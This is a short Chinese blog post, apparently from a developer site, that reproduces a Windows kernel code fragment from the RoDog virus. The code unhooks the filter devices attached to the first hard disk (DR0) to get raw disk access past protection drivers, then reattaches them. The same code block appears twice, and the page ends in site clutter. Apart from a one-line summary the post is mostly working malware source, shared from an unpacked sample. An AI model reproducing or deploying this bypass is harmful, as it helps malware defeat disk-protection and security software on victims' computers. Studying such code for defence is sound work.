本文分析了RoDog病毒中用于绕过硬盘设备保护的代码片段。通过定义特定的设备名称并利用Windows内核API,该病毒可以暂时断开硬盘设备与上层设备的连接,从而实现对底层硬盘的直接访问。
来自 rodog病毒
//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
if(HddDr0Device->AttachedDevice)
{ // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject);
}
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // 恢复DR0上的附加设备
HddDr0Device->AttachedDevice = HddAttDevice;
}
}
//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
if(HddDr0Device->AttachedDevice)
{ // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject);
}
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // 恢复DR0上的附加设备
HddDr0Device->AttachedDevice = HddAttDevice;
}
}
扫一扫
1865
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
